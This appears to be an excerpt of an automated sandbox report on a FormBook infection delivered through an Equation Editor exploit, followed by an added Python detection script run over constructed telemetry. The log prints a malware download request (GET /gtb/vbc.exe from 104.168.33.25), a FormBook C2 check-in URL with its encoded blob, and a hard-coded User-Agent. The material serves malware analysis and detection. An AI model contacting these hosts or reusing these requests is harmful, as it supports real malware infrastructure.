        Source: explorer.exe, 00000007.00000000.999886715.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014689311.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999403275.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.990012033.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014285253.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1002158677.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1025987393.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016145834.00000000003A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
        Source: explorer.exe, 00000007.00000000.1050559717.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019814122.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004615683.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992542708.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerq
        Source: explorer.exe, 00000007.00000000.1021455911.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995504335.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006602259.0000000004385000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerv
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
        Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
        Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
        Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F22AACBE.emf
        Source: unknown | DNS traffic detected: queries for: www.insurancecentral.info
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03660560 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: global traffic | HTTP traffic detected: GET /gtb/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 104.168.33.25 | Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr HTTP/1.1 | Host: www.xinli-ac.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none printable)
        Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
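The networking entries above describe the whole chain in three records: the Equation Editor shellcode calls URLDownloadToFileW and ShellExecuteExW (function 2_2_03660560), fetches /gtb/vbc.exe from 104.168.33.25 with a hard-coded IE7/Windows 7 User-Agent, and the injected FormBook payload later checks in with a GET whose query carries a base64 blob, Connection: close and a short all-NUL body. The script below is an added example, not code from Joe Sandbox or from the malware, that turns those observations into detection logic and runs it over constructed telemetry. Assumptions: the host events use a hypothetical "kind|image|detail" line format; the sample events and HTTP requests are reconstructed from the values printed in this report plus one benign request; the C2 path regex is a heuristic generalised from the single check-in on this page, so it needs tuning against real traffic before deployment.

```python
"""Detection logic for the EQNEDT32 -> vbc.exe -> FormBook chain in this report.
Added example run over constructed telemetry; not Joe Sandbox or malware code."""
import base64
import re
from dataclasses import dataclass

# Constructed host telemetry in a hypothetical "kind|image|detail" format; the
# values mirror the events the sandbox recorded for this sample.
SAMPLE_EVENTS = [
    "file_create|C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE|C:\\Users\\Public\\vbc.exe",
    "net_connect|C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE|104.168.33.25:80",
    "proc_create|C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE|C:\\Users\\Public\\vbc.exe",
    "file_create|C:\\Program Files\\Microsoft Office\\Office14\\EXCEL.EXE|C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\F22AACBE.emf",
    "net_connect|C:\\Windows\\explorer.exe|www.xinli-ac.com:80",
]

# User-Agent the report's Yara hit (APT_NK_Methodology_Artificial_UserAgent_IE_Win7)
# flags in EQNEDT32.EXE memory; it is also what the download request carried.
HARDCODED_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; "
                "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
                "Media Center PC 6.0; .NET4.0C; .NET4.0E)")

# Constructed raw HTTP requests: the two the report captured plus a benign one.
SAMPLE_HTTP = [
    (b"GET /gtb/vbc.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
     b"User-Agent: " + HARDCODED_UA.encode() + b"\r\nHost: 104.168.33.25\r\n"
     b"Connection: Keep-Alive\r\n\r\n"),
    (b"GET /m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr HTTP/1.1\r\n"
     b"Host: www.xinli-ac.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nConnection: keep-alive\r\n\r\n",
]


@dataclass
class Finding:
    rule: str
    evidence: str


PE_EXTENSIONS = (".exe", ".dll", ".scr")


def check_process_events(lines):
    """Equation Editor has no business touching the network, dropping PE files or
    spawning children; each is a strong CVE-2017-11882 / CVE-2018-0802 signal
    (the Sigma rules listed in the report encode the same idea)."""
    findings = []
    for line in lines:
        kind, image, detail = line.split("|", 2)
        if image.lower().rsplit("\\", 1)[-1] != "eqnedt32.exe":
            continue
        if kind == "net_connect":
            findings.append(Finding("EQNEDT32_network_connection", detail))
        elif kind == "file_create" and detail.lower().endswith(PE_EXTENSIONS):
            # Extension check only; a real pipeline would inspect the MZ header.
            findings.append(Finding("EQNEDT32_drops_pe", detail))
        elif kind == "proc_create":
            findings.append(Finding("EQNEDT32_child_process", detail))
    return findings


def parse_http_request(raw):
    """Minimal HTTP/1.1 request parser: (method, target, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


# Shape of the FormBook check-in on this page: /<short dir>/?<key>=<base64>&<key>=<alnum>.
# Heuristic generalised from that one request (assumption); tune before deploying.
C2_PATH = re.compile(
    r"^/(?P<dir>[a-z0-9]{3,8})/\?(?P<k1>[A-Za-z0-9_-]{1,4})="
    r"(?P<blob>[A-Za-z0-9+/]+={0,2})&(?P<k2>[A-Za-z0-9_-]{1,4})=(?P<tail>[A-Za-z0-9]{5,12})$")


def check_http_request(raw):
    method, target, headers, body = parse_http_request(raw)
    findings = []
    host = headers.get("host", "")
    if method == "GET" and target.lower().endswith(PE_EXTENSIONS):
        findings.append(Finding("exe_download_over_http", host + target))
    m = C2_PATH.match(target)
    if method == "GET" and m and headers.get("connection", "").lower() == "close":
        try:  # the blob must be strict base64, as in the captured request
            blob = base64.b64decode(m.group("blob"), validate=True)
        except ValueError:
            blob = None
        if blob:
            findings.append(Finding("formbook_c2_checkin",
                                    f"host={host} dir={m.group('dir')} blob_bytes={len(blob)}"))
    if body and set(body) == {0}:  # FormBook's GET carried seven NUL bytes
        findings.append(Finding("zero_padded_body", f"{len(body)} NUL bytes"))
    return findings


def is_hardcoded_ie7_ua(user_agent):
    """Corroborating context only: on the wire this string is also a legitimate
    IE7-on-Windows-7 User-Agent, so it is not a finding by itself."""
    return user_agent == HARDCODED_UA


if __name__ == "__main__":
    for f in check_process_events(SAMPLE_EVENTS):
        print("HOST", f)
    for raw in SAMPLE_HTTP:
        for f in check_http_request(raw):
            print("HTTP", f)
```

Run stand-alone it prints three host findings for EQNEDT32.EXE (PE drop, network connection, child process), one download finding for 104.168.33.25/gtb/vbc.exe, and a check-in plus NUL-body finding for www.xinli-ac.com; the benign request produces nothing. The host-side rules are the ones worth deploying first: they fire before any payload runs and do not depend on the C2 URL shape, which FormBook rotates per campaign.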

        E-Banking Fraud

        Source: Yara match | File source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe (dropped file)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe (dropped file)
        Source: 2.2.EQNEDT32.EXE.5acf30.0.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 | hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
        Source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 2.2.EQNEDT32.EXE.5acf30.0.unpack, type: UNPACKEDPE | Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 | hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
        Source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
